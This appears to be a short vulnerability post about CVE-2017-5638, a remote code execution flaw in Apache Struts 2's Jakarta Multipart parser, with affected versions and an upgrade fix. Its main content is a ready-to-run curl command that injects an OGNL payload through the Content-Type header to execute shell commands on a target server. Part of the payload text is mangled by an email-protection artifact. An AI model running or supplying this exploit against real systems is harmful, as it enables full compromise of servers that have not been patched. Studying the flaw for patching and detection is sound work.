Listen to this Post
How the mentioned CVE works:
The CVE-2017-5638 vulnerability exists in the Jakarta Multipart parser of Apache Struts 2. An attacker can exploit this by sending a malicious `Content-Type` HTTP header in a file upload request. The parser incorrectly processes the header’s value, evaluating any Object-Graph Navigation Language (OGNL) expressions contained within it. This evaluation occurs before any file upload data is handled, allowing the attacker to inject and execute arbitrary OGNL code on the server. Since OGNL expressions can trigger static method execution and provide access to the underlying Java runtime, this flaw permits remote code execution with the privileges of the Struts application server. The attack is facilitated because the error handler during a failed upload attempts to create a user-friendly message but instead interprets the malicious header as an OGNL expression.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: 2017-03-10
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/upload.action`
How Exploit:
Malicious Content-Type header injection.
Protection from this CVE:
Upgrade to Struts 2.3.32 or 2.5.10.1.
Impact:
Full server compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

